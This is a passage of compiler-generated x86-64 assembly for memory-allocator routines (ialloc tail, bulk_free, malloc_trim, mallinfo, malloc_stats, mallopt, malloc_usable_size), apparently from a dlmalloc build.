jmp LBB18_11
LBB18_10:
movq -24(%rbp), %rax
shlq $3, %rax
addq $8, %rax
addq $15, %rax
andq $-16, %rax
movq %rax, -160(%rbp) ## 8-byte Spill
LBB18_11:
movq -160(%rbp), %rax ## 8-byte Reload
movq %rax, -72(%rbp)
LBB18_12:
movl -36(%rbp), %eax
andl $1, %eax
cmpl $0, %eax
je LBB18_17
## %bb.13:
movq -32(%rbp), %rax
cmpq $23, (%rax)
jae LBB18_15
## %bb.14:
movl $32, %eax
movq %rax, -168(%rbp) ## 8-byte Spill
jmp LBB18_16
LBB18_15:
movq -32(%rbp), %rax
movq (%rax), %rax
addq $8, %rax
addq $15, %rax
andq $-16, %rax
movq %rax, -168(%rbp) ## 8-byte Spill
LBB18_16:
movq -168(%rbp), %rax ## 8-byte Reload
movq %rax, -56(%rbp)
movq -24(%rbp), %rax
imulq -56(%rbp), %rax
movq %rax, -64(%rbp)
jmp LBB18_25
LBB18_17:
movq $0, -56(%rbp)
movq $0, -64(%rbp)
movq $0, -136(%rbp)
LBB18_18: ## =>This Inner Loop Header: Depth=1
movq -136(%rbp), %rax
cmpq -24(%rbp), %rax
je LBB18_24
## %bb.19: ## in Loop: Header=BB18_18 Depth=1
movq -32(%rbp), %rax
movq -136(%rbp), %rcx
cmpq $23, (%rax,%rcx,8)
jae LBB18_21
## %bb.20: ## in Loop: Header=BB18_18 Depth=1
movl $32, %eax
movq %rax, -176(%rbp) ## 8-byte Spill
jmp LBB18_22
LBB18_21: ## in Loop: Header=BB18_18 Depth=1
movq -32(%rbp), %rax
movq -136(%rbp), %rcx
movq (%rax,%rcx,8), %rax
addq $8, %rax
addq $15, %rax
andq $-16, %rax
movq %rax, -176(%rbp) ## 8-byte Spill
LBB18_22: ## in Loop: Header=BB18_18 Depth=1
movq -176(%rbp), %rax ## 8-byte Reload
addq -64(%rbp), %rax
movq %rax, -64(%rbp)
## %bb.23: ## in Loop: Header=BB18_18 Depth=1
movq -136(%rbp), %rax
addq $1, %rax
movq %rax, -136(%rbp)
jmp LBB18_18
LBB18_24:
jmp LBB18_25
LBB18_25:
movq -64(%rbp), %rax
addq -72(%rbp), %rax
movq %rax, -128(%rbp)
movq -16(%rbp), %rax
movl 880(%rax), %eax
## kill: def $rax killed $eax
andq $1, %rax
## kill: def $eax killed $eax killed $rax
movl %eax, -116(%rbp)
movq -16(%rbp), %rax
movl 880(%rax), %ecx
## kill: def $rcx killed $ecx
andq $-2, %rcx
## kill: def $ecx killed $ecx killed $rcx
movl %ecx, 880(%rax)
movq -128(%rbp), %rdi
subq $8, %rdi
callq _malloc
movq %rax, -80(%rbp)
cmpl $0, -116(%rbp)
je LBB18_27
## %bb.26:
movq -16(%rbp), %rax
movl 880(%rax), %ecx
## kill: def $rcx killed $ecx
orq $1, %rcx
## kill: def $ecx killed $ecx killed $rcx
movl %ecx, 880(%rax)
LBB18_27:
cmpq $0, -80(%rbp)
jne LBB18_29
## %bb.28:
movq $0, -8(%rbp)
jmp LBB18_46
LBB18_29:
movq -80(%rbp), %rax
addq $-16, %rax
movq %rax, -88(%rbp)
movq -88(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -96(%rbp)
movl -36(%rbp), %eax
andl $2, %eax
cmpl $0, %eax
je LBB18_31
## %bb.30:
movq -80(%rbp), %rdi
movq -96(%rbp), %rdx
subq $8, %rdx
subq -72(%rbp), %rdx
xorl %esi, %esi
movq $-1, %rcx
callq ___memset_chk
LBB18_31:
cmpq $0, -104(%rbp)
jne LBB18_33
## %bb.32:
movq -88(%rbp), %rax
addq -64(%rbp), %rax
movq %rax, -112(%rbp)
movq -96(%rbp), %rax
subq -64(%rbp), %rax
movq %rax, -144(%rbp)
movq -112(%rbp), %rax
addq $16, %rax
movq %rax, -104(%rbp)
movq -144(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -112(%rbp), %rax
movq %rcx, 8(%rax)
movq -64(%rbp), %rax
movq %rax, -96(%rbp)
LBB18_33:
movq $0, -136(%rbp)
LBB18_34: ## =>This Inner Loop Header: Depth=1
movq -88(%rbp), %rdx
addq $16, %rdx
movq -104(%rbp), %rax
movq -136(%rbp), %rcx
movq %rdx, (%rax,%rcx,8)
movq -136(%rbp), %rax
movq -24(%rbp), %rcx
subq $1, %rcx
cmpq %rcx, %rax
je LBB18_42
## %bb.35: ## in Loop: Header=BB18_34 Depth=1
cmpq $0, -56(%rbp)
je LBB18_37
## %bb.36: ## in Loop: Header=BB18_34 Depth=1
movq -56(%rbp), %rax
movq %rax, -128(%rbp)
jmp LBB18_41
LBB18_37: ## in Loop: Header=BB18_34 Depth=1
movq -32(%rbp), %rax
movq -136(%rbp), %rcx
cmpq $23, (%rax,%rcx,8)
jae LBB18_39
## %bb.38: ## in Loop: Header=BB18_34 Depth=1
movl $32, %eax
movq %rax, -184(%rbp) ## 8-byte Spill
jmp LBB18_40
LBB18_39: ## in Loop: Header=BB18_34 Depth=1
movq -32(%rbp), %rax
movq -136(%rbp), %rcx
movq (%rax,%rcx,8), %rax
addq $8, %rax
addq $15, %rax
andq $-16, %rax
movq %rax, -184(%rbp) ## 8-byte Spill
LBB18_40: ## in Loop: Header=BB18_34 Depth=1
movq -184(%rbp), %rax ## 8-byte Reload
movq %rax, -128(%rbp)
LBB18_41: ## in Loop: Header=BB18_34 Depth=1
movq -128(%rbp), %rcx
movq -96(%rbp), %rax
subq %rcx, %rax
movq %rax, -96(%rbp)
movq -128(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -88(%rbp), %rax
movq %rcx, 8(%rax)
movq -88(%rbp), %rax
addq -128(%rbp), %rax
movq %rax, -88(%rbp)
jmp LBB18_43
LBB18_42:
movq -96(%rbp), %rcx
orq $1, %rcx
orq $2, %rcx
movq -88(%rbp), %rax
movq %rcx, 8(%rax)
jmp LBB18_45
LBB18_43: ## in Loop: Header=BB18_34 Depth=1
jmp LBB18_44
LBB18_44: ## in Loop: Header=BB18_34 Depth=1
movq -136(%rbp), %rax
addq $1, %rax
movq %rax, -136(%rbp)
jmp LBB18_34
LBB18_45:
movq -104(%rbp), %rax
movq %rax, -8(%rbp)
LBB18_46:
movq -8(%rbp), %rax
addq $192, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _independent_comalloc ## -- Begin function independent_comalloc
.p2align 4, 0x90
_independent_comalloc: ## @independent_comalloc
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $32, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq -8(%rbp), %rsi
movq -16(%rbp), %rdx
movq -24(%rbp), %r8
leaq __gm_(%rip), %rdi
xorl %ecx, %ecx
callq _ialloc
addq $32, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _bulk_free ## -- Begin function bulk_free
.p2align 4, 0x90
_bulk_free: ## @bulk_free
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq -8(%rbp), %rsi
movq -16(%rbp), %rdx
leaq __gm_(%rip), %rdi
callq _internal_bulk_free
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function internal_bulk_free
_internal_bulk_free: ## @internal_bulk_free
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $112, %rsp
movq %rdi, -8(%rbp)
movq %rsi, -16(%rbp)
movq %rdx, -24(%rbp)
movq $0, -32(%rbp)
movq -16(%rbp), %rax
movq -24(%rbp), %rcx
shlq $3, %rcx
addq %rcx, %rax
movq %rax, -48(%rbp)
movq -16(%rbp), %rax
movq %rax, -40(%rbp)
LBB21_1: ## =>This Inner Loop Header: Depth=1
movq -40(%rbp), %rax
cmpq -48(%rbp), %rax
je LBB21_15
## %bb.2: ## in Loop: Header=BB21_1 Depth=1
movq -40(%rbp), %rax
movq (%rax), %rax
movq %rax, -56(%rbp)
cmpq $0, -56(%rbp)
je LBB21_13
## %bb.3: ## in Loop: Header=BB21_1 Depth=1
movq -56(%rbp), %rax
addq $-16, %rax
movq %rax, -64(%rbp)
movq -64(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -72(%rbp)
movq -40(%rbp), %rax
movq $0, (%rax)
movq -64(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 24(%rdx), %rcx
movb %al, -97(%rbp) ## 1-byte Spill
jb LBB21_5
## %bb.4: ## in Loop: Header=BB21_1 Depth=1
movq -64(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $1, %rax
setne %al
movb %al, -97(%rbp) ## 1-byte Spill
LBB21_5: ## in Loop: Header=BB21_1 Depth=1
movb -97(%rbp), %al ## 1-byte Reload
andb $1, %al
movzbl %al, %eax
cltq
cmpq $0, %rax
je LBB21_11
## %bb.6: ## in Loop: Header=BB21_1 Depth=1
movq -40(%rbp), %rax
addq $8, %rax
movq %rax, -80(%rbp)
movq -64(%rbp), %rax
movq -64(%rbp), %rcx
movq 8(%rcx), %rcx
andq $-8, %rcx
addq %rcx, %rax
movq %rax, -88(%rbp)
movq -80(%rbp), %rax
cmpq -48(%rbp), %rax
je LBB21_9
## %bb.7: ## in Loop: Header=BB21_1 Depth=1
movq -80(%rbp), %rax
movq (%rax), %rax
movq -88(%rbp), %rcx
addq $16, %rcx
cmpq %rcx, %rax
jne LBB21_9
## %bb.8: ## in Loop: Header=BB21_1 Depth=1
movq -88(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
addq -72(%rbp), %rax
movq %rax, -96(%rbp)
movq -64(%rbp), %rax
movq 8(%rax), %rcx
andq $1, %rcx
orq -96(%rbp), %rcx
orq $2, %rcx
movq -64(%rbp), %rax
movq %rcx, 8(%rax)
movq -64(%rbp), %rax
movq -96(%rbp), %rcx
movq 8(%rax,%rcx), %rdx
orq $1, %rdx
movq %rdx, 8(%rax,%rcx)
movq -64(%rbp), %rcx
addq $16, %rcx
movq -80(%rbp), %rax
movq %rcx, (%rax)
jmp LBB21_10
LBB21_9: ## in Loop: Header=BB21_1 Depth=1
movq -8(%rbp), %rdi
movq -64(%rbp), %rsi
movq -72(%rbp), %rdx
callq _dispose_chunk
LBB21_10: ## in Loop: Header=BB21_1 Depth=1
jmp LBB21_12
LBB21_11:
callq _abort
LBB21_12: ## in Loop: Header=BB21_1 Depth=1
jmp LBB21_13
LBB21_13: ## in Loop: Header=BB21_1 Depth=1
jmp LBB21_14
LBB21_14: ## in Loop: Header=BB21_1 Depth=1
movq -40(%rbp), %rax
addq $8, %rax
movq %rax, -40(%rbp)
jmp LBB21_1
LBB21_15:
movq -8(%rbp), %rax
movq 16(%rax), %rax
movq -8(%rbp), %rcx
cmpq 48(%rcx), %rax
jbe LBB21_17
## %bb.16:
movq -8(%rbp), %rdi
xorl %eax, %eax
movl %eax, %esi
callq _sys_trim
LBB21_17:
movq -32(%rbp), %rax
addq $112, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _malloc_trim ## -- Begin function malloc_trim
.p2align 4, 0x90
_malloc_trim: ## @malloc_trim
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, -8(%rbp)
movl $0, -12(%rbp)
movb $1, %al
cmpq $0, _mparams(%rip)
movb %al, -13(%rbp) ## 1-byte Spill
jne LBB22_2
## %bb.1:
callq _init_mparams
cmpl $0, %eax
setne %al
movb %al, -13(%rbp) ## 1-byte Spill
LBB22_2:
movb -13(%rbp), %al ## 1-byte Reload
movq -8(%rbp), %rsi
leaq __gm_(%rip), %rdi
callq _sys_trim
movl %eax, -12(%rbp)
movl -12(%rbp), %eax
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _malloc_footprint ## -- Begin function malloc_footprint
.p2align 4, 0x90
_malloc_footprint: ## @malloc_footprint
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq __gm_+856(%rip), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _malloc_max_footprint ## -- Begin function malloc_max_footprint
.p2align 4, 0x90
_malloc_max_footprint: ## @malloc_max_footprint
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq __gm_+864(%rip), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _malloc_footprint_limit ## -- Begin function malloc_footprint_limit
.p2align 4, 0x90
_malloc_footprint_limit: ## @malloc_footprint_limit
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq __gm_+872(%rip), %rax
movq %rax, -8(%rbp)
cmpq $0, -8(%rbp)
jne LBB25_2
## %bb.1:
movq $-1, %rax
movq %rax, -16(%rbp) ## 8-byte Spill
jmp LBB25_3
LBB25_2:
movq -8(%rbp), %rax
movq %rax, -16(%rbp) ## 8-byte Spill
LBB25_3:
movq -16(%rbp), %rax ## 8-byte Reload
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _malloc_set_footprint_limit ## -- Begin function malloc_set_footprint_limit
.p2align 4, 0x90
_malloc_set_footprint_limit: ## @malloc_set_footprint_limit
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -8(%rbp)
cmpq $0, -8(%rbp)
jne LBB26_2
## %bb.1:
movq _mparams+16(%rip), %rax
subq $1, %rax
addq $1, %rax
movq _mparams+16(%rip), %rcx
subq $1, %rcx
xorq $-1, %rcx
andq %rcx, %rax
movq %rax, -16(%rbp)
LBB26_2:
cmpq $-1, -8(%rbp)
jne LBB26_4
## %bb.3:
movq $0, -16(%rbp)
jmp LBB26_5
LBB26_4:
movq -8(%rbp), %rax
movq _mparams+16(%rip), %rcx
subq $1, %rcx
addq %rcx, %rax
movq _mparams+16(%rip), %rcx
subq $1, %rcx
xorq $-1, %rcx
andq %rcx, %rax
movq %rax, -16(%rbp)
LBB26_5:
movq -16(%rbp), %rax
movq %rax, __gm_+872(%rip)
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _mallinfo ## -- Begin function mallinfo
.p2align 4, 0x90
_mallinfo: ## @mallinfo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movq %rdi, %rax
movq %rax, -8(%rbp) ## 8-byte Spill
leaq __gm_(%rip), %rsi
callq _internal_mallinfo
movq -8(%rbp), %rax ## 8-byte Reload
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function internal_mallinfo
_internal_mallinfo: ## @internal_mallinfo
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $112, %rsp
movq %rdi, -80(%rbp) ## 8-byte Spill
movq %rdi, %rax
movq %rax, -72(%rbp) ## 8-byte Spill
movq %rsi, -8(%rbp)
xorl %esi, %esi
movl $80, %edx
callq _memset
movb $1, %al
cmpq $0, _mparams(%rip)
movb %al, -57(%rbp) ## 1-byte Spill
jne LBB28_2
## %bb.1:
callq _init_mparams
cmpl $0, %eax
setne %al
movb %al, -57(%rbp) ## 1-byte Spill
LBB28_2:
movb -57(%rbp), %al ## 1-byte Reload
movq -8(%rbp), %rax
cmpq $0, 40(%rax)
je LBB28_19
## %bb.3:
movq $1, -16(%rbp)
movq -8(%rbp), %rax
movq 16(%rax), %rax
addq $80, %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movq %rax, -32(%rbp)
movq -8(%rbp), %rax
addq $888, %rax ## imm = 0x378
movq %rax, -40(%rbp)
LBB28_4: ## =>This Loop Header: Depth=1
## Child Loop BB28_9 Depth 2
cmpq $0, -40(%rbp)
je LBB28_18
## %bb.5: ## in Loop: Header=BB28_4 Depth=1
movq -40(%rbp), %rax
movq (%rax), %rax
movq %rax, -88(%rbp) ## 8-byte Spill
movq -40(%rbp), %rax
movq (%rax), %rax
addq $16, %rax
andq $15, %rax
cmpq $0, %rax
jne LBB28_7
## %bb.6: ## in Loop: Header=BB28_4 Depth=1
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -96(%rbp) ## 8-byte Spill
jmp LBB28_8
LBB28_7: ## in Loop: Header=BB28_4 Depth=1
movq -40(%rbp), %rax
movq (%rax), %rcx
addq $16, %rcx
andq $15, %rcx
movl $16, %eax
subq %rcx, %rax
andq $15, %rax
movq %rax, -96(%rbp) ## 8-byte Spill
LBB28_8: ## in Loop: Header=BB28_4 Depth=1
movq -88(%rbp), %rax ## 8-byte Reload
movq -96(%rbp), %rcx ## 8-byte Reload
addq %rcx, %rax
movq %rax, -48(%rbp)
LBB28_9: ## Parent Loop BB28_4 Depth=1
## => This Inner Loop Header: Depth=2
movq -48(%rbp), %rcx
movq -40(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq (%rdx), %rcx
movb %al, -97(%rbp) ## 1-byte Spill
jb LBB28_13
## %bb.10: ## in Loop: Header=BB28_9 Depth=2
movq -48(%rbp), %rcx
movq -40(%rbp), %rax
movq (%rax), %rdx
movq -40(%rbp), %rax
addq 8(%rax), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq %rdx, %rcx
movb %al, -97(%rbp) ## 1-byte Spill
jae LBB28_13
## %bb.11: ## in Loop: Header=BB28_9 Depth=2
movq -48(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 40(%rdx), %rcx
movb %al, -97(%rbp) ## 1-byte Spill
je LBB28_13
## %bb.12: ## in Loop: Header=BB28_9 Depth=2
movq -48(%rbp), %rax
cmpq $11, 8(%rax)
setne %al
movb %al, -97(%rbp) ## 1-byte Spill
LBB28_13: ## in Loop: Header=BB28_9 Depth=2
movb -97(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB28_14
jmp LBB28_17
LBB28_14: ## in Loop: Header=BB28_9 Depth=2
movq -48(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq %rax, -56(%rbp)
movq -56(%rbp), %rax
addq -32(%rbp), %rax
movq %rax, -32(%rbp)
movq -48(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $1, %rax
jne LBB28_16
## %bb.15: ## in Loop: Header=BB28_9 Depth=2
movq -56(%rbp), %rax
addq -24(%rbp), %rax
movq %rax, -24(%rbp)
movq -16(%rbp), %rax
addq $1, %rax
movq %rax, -16(%rbp)
LBB28_16: ## in Loop: Header=BB28_9 Depth=2
movq -48(%rbp), %rax
movq -48(%rbp), %rcx
movq 8(%rcx), %rcx
andq $-8, %rcx
addq %rcx, %rax
movq %rax, -48(%rbp)
jmp LBB28_9
LBB28_17: ## in Loop: Header=BB28_4 Depth=1
movq -40(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -40(%rbp)
jmp LBB28_4
LBB28_18:
movq -80(%rbp), %rax ## 8-byte Reload
movq -32(%rbp), %rcx
movq %rcx, (%rax)
movq -16(%rbp), %rcx
movq %rcx, 8(%rax)
movq -8(%rbp), %rcx
movq 856(%rcx), %rcx
subq -32(%rbp), %rcx
movq %rcx, 32(%rax)
movq -8(%rbp), %rcx
movq 864(%rcx), %rcx
movq %rcx, 40(%rax)
movq -8(%rbp), %rcx
movq 856(%rcx), %rcx
subq -24(%rbp), %rcx
movq %rcx, 56(%rax)
movq -24(%rbp), %rcx
movq %rcx, 64(%rax)
movq -8(%rbp), %rcx
movq 16(%rcx), %rcx
movq %rcx, 72(%rax)
LBB28_19:
movq -72(%rbp), %rax ## 8-byte Reload
addq $112, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _malloc_stats ## -- Begin function malloc_stats
.p2align 4, 0x90
_malloc_stats: ## @malloc_stats
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
leaq __gm_(%rip), %rdi
callq _internal_malloc_stats
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function internal_malloc_stats
_internal_malloc_stats: ## @internal_malloc_stats
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $80, %rsp
movq %rdi, -8(%rbp)
movb $1, %al
cmpq $0, _mparams(%rip)
movb %al, -49(%rbp) ## 1-byte Spill
jne LBB30_2
## %bb.1:
callq _init_mparams
cmpl $0, %eax
setne %al
movb %al, -49(%rbp) ## 1-byte Spill
LBB30_2:
movb -49(%rbp), %al ## 1-byte Reload
movq $0, -16(%rbp)
movq $0, -24(%rbp)
movq $0, -32(%rbp)
movq -8(%rbp), %rax
cmpq $0, 40(%rax)
je LBB30_19
## %bb.3:
movq -8(%rbp), %rax
addq $888, %rax ## imm = 0x378
movq %rax, -40(%rbp)
movq -8(%rbp), %rax
movq 864(%rax), %rax
movq %rax, -16(%rbp)
movq -8(%rbp), %rax
movq 856(%rax), %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movq -8(%rbp), %rcx
movq 16(%rcx), %rcx
addq $80, %rcx
subq %rcx, %rax
movq %rax, -32(%rbp)
LBB30_4: ## =>This Loop Header: Depth=1
## Child Loop BB30_9 Depth 2
cmpq $0, -40(%rbp)
je LBB30_18
## %bb.5: ## in Loop: Header=BB30_4 Depth=1
movq -40(%rbp), %rax
movq (%rax), %rax
movq %rax, -64(%rbp) ## 8-byte Spill
movq -40(%rbp), %rax
movq (%rax), %rax
addq $16, %rax
andq $15, %rax
cmpq $0, %rax
jne LBB30_7
## %bb.6: ## in Loop: Header=BB30_4 Depth=1
xorl %eax, %eax
## kill: def $rax killed $eax
movq %rax, -72(%rbp) ## 8-byte Spill
jmp LBB30_8
LBB30_7: ## in Loop: Header=BB30_4 Depth=1
movq -40(%rbp), %rax
movq (%rax), %rcx
addq $16, %rcx
andq $15, %rcx
movl $16, %eax
subq %rcx, %rax
andq $15, %rax
movq %rax, -72(%rbp) ## 8-byte Spill
LBB30_8: ## in Loop: Header=BB30_4 Depth=1
movq -64(%rbp), %rax ## 8-byte Reload
movq -72(%rbp), %rcx ## 8-byte Reload
addq %rcx, %rax
movq %rax, -48(%rbp)
LBB30_9: ## Parent Loop BB30_4 Depth=1
## => This Inner Loop Header: Depth=2
movq -48(%rbp), %rcx
movq -40(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq (%rdx), %rcx
movb %al, -73(%rbp) ## 1-byte Spill
jb LBB30_13
## %bb.10: ## in Loop: Header=BB30_9 Depth=2
movq -48(%rbp), %rcx
movq -40(%rbp), %rax
movq (%rax), %rdx
movq -40(%rbp), %rax
addq 8(%rax), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq %rdx, %rcx
movb %al, -73(%rbp) ## 1-byte Spill
jae LBB30_13
## %bb.11: ## in Loop: Header=BB30_9 Depth=2
movq -48(%rbp), %rcx
movq -8(%rbp), %rdx
xorl %eax, %eax
## kill: def $al killed $al killed $eax
cmpq 40(%rdx), %rcx
movb %al, -73(%rbp) ## 1-byte Spill
je LBB30_13
## %bb.12: ## in Loop: Header=BB30_9 Depth=2
movq -48(%rbp), %rax
cmpq $11, 8(%rax)
setne %al
movb %al, -73(%rbp) ## 1-byte Spill
LBB30_13: ## in Loop: Header=BB30_9 Depth=2
movb -73(%rbp), %al ## 1-byte Reload
testb $1, %al
jne LBB30_14
jmp LBB30_17
LBB30_14: ## in Loop: Header=BB30_9 Depth=2
movq -48(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $1, %rax
jne LBB30_16
## %bb.15: ## in Loop: Header=BB30_9 Depth=2
movq -48(%rbp), %rax
movq 8(%rax), %rcx
andq $-8, %rcx
movq -32(%rbp), %rax
subq %rcx, %rax
movq %rax, -32(%rbp)
LBB30_16: ## in Loop: Header=BB30_9 Depth=2
movq -48(%rbp), %rax
movq -48(%rbp), %rcx
movq 8(%rcx), %rcx
andq $-8, %rcx
addq %rcx, %rax
movq %rax, -48(%rbp)
jmp LBB30_9
LBB30_17: ## in Loop: Header=BB30_4 Depth=1
movq -40(%rbp), %rax
movq 16(%rax), %rax
movq %rax, -40(%rbp)
jmp LBB30_4
LBB30_18:
jmp LBB30_19
LBB30_19:
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -16(%rbp), %rdx
leaq L_.str(%rip), %rsi
movb $0, %al
callq _fprintf
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -24(%rbp), %rdx
leaq L_.str.1(%rip), %rsi
movb $0, %al
callq _fprintf
movq ___stderrp@GOTPCREL(%rip), %rax
movq (%rax), %rdi
movq -32(%rbp), %rdx
leaq L_.str.2(%rip), %rsi
movb $0, %al
callq _fprintf
addq $80, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _mallopt ## -- Begin function mallopt
.p2align 4, 0x90
_mallopt: ## @mallopt
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $16, %rsp
movl %edi, -4(%rbp)
movl %esi, -8(%rbp)
movl -4(%rbp), %edi
movl -8(%rbp), %esi
callq _change_mparam
addq $16, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.p2align 4, 0x90 ## -- Begin function change_mparam
_change_mparam: ## @change_mparam
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
subq $48, %rsp
movl %edi, -8(%rbp)
movl %esi, -12(%rbp)
movb $1, %al
cmpq $0, _mparams(%rip)
movb %al, -25(%rbp) ## 1-byte Spill
jne LBB32_2
## %bb.1:
callq _init_mparams
cmpl $0, %eax
setne %al
movb %al, -25(%rbp) ## 1-byte Spill
LBB32_2:
movb -25(%rbp), %al ## 1-byte Reload
cmpl $-1, -12(%rbp)
jne LBB32_4
## %bb.3:
movq $-1, %rax
movq %rax, -40(%rbp) ## 8-byte Spill
jmp LBB32_5
LBB32_4:
movslq -12(%rbp), %rax
movq %rax, -40(%rbp) ## 8-byte Spill
LBB32_5:
movq -40(%rbp), %rax ## 8-byte Reload
movq %rax, -24(%rbp)
movl -8(%rbp), %eax
movl %eax, -44(%rbp) ## 4-byte Spill
subl $-3, %eax
je LBB32_11
jmp LBB32_14
LBB32_14:
movl -44(%rbp), %eax ## 4-byte Reload
subl $-2, %eax
je LBB32_7
jmp LBB32_15
LBB32_15:
movl -44(%rbp), %eax ## 4-byte Reload
subl $-1, %eax
jne LBB32_12
jmp LBB32_6
LBB32_6:
movq -24(%rbp), %rax
movq %rax, _mparams+32(%rip)
movl $1, -4(%rbp)
jmp LBB32_13
LBB32_7:
movq -24(%rbp), %rax
cmpq _mparams+8(%rip), %rax
jb LBB32_10
## %bb.8:
movq -24(%rbp), %rax
movq -24(%rbp), %rcx
subq $1, %rcx
andq %rcx, %rax
cmpq $0, %rax
jne LBB32_10
## %bb.9:
movq -24(%rbp), %rax
movq %rax, _mparams+16(%rip)
movl $1, -4(%rbp)
jmp LBB32_13
LBB32_10:
movl $0, -4(%rbp)
jmp LBB32_13
LBB32_11:
movq -24(%rbp), %rax
movq %rax, _mparams+24(%rip)
movl $1, -4(%rbp)
jmp LBB32_13
LBB32_12:
movl $0, -4(%rbp)
LBB32_13:
movl -4(%rbp), %eax
addq $48, %rsp
popq %rbp
retq
.cfi_endproc
## -- End function
.globl _malloc_usable_size ## -- Begin function malloc_usable_size
.p2align 4, 0x90
_malloc_usable_size: ## @malloc_usable_size
.cfi_startproc
## %bb.0:
pushq %rbp
.cfi_def_cfa_offset 16
.cfi_offset %rbp, -16
movq %rsp, %rbp
.cfi_def_cfa_register %rbp
movq %rdi, -16(%rbp)
cmpq $0, -16(%rbp)
je LBB33_4
## %bb.1:
movq -16(%rbp), %rax
addq $-16, %rax
movq %rax, -24(%rbp)
movq -24(%rbp), %rax
movq 8(%rax), %rax
andq $3, %rax
cmpq $1, %rax
je LBB33_3
## %bb.2:
movq -24(%rbp), %rax
movq 8(%rax), %rax
andq $-8, %rax
movq -24(%rbp), %rcx
movq 8(%rcx), %rsi
andq $3, %rsi
movl $8, %ecx
movl $16, %edx
cmpq $0, %rsi
cmoveq %rdx, %rcx
subq %rcx, %rax
movq %rax, -8(%rbp)
jmp LBB33_5
LBB33_3:
jmp LBB33_4
LBB33_4:
movq $0, -8(%rbp)
LBB33_5:
movq -8(%rbp), %rax
popq %rbp
retq
.cfi_endproc
## -- End function
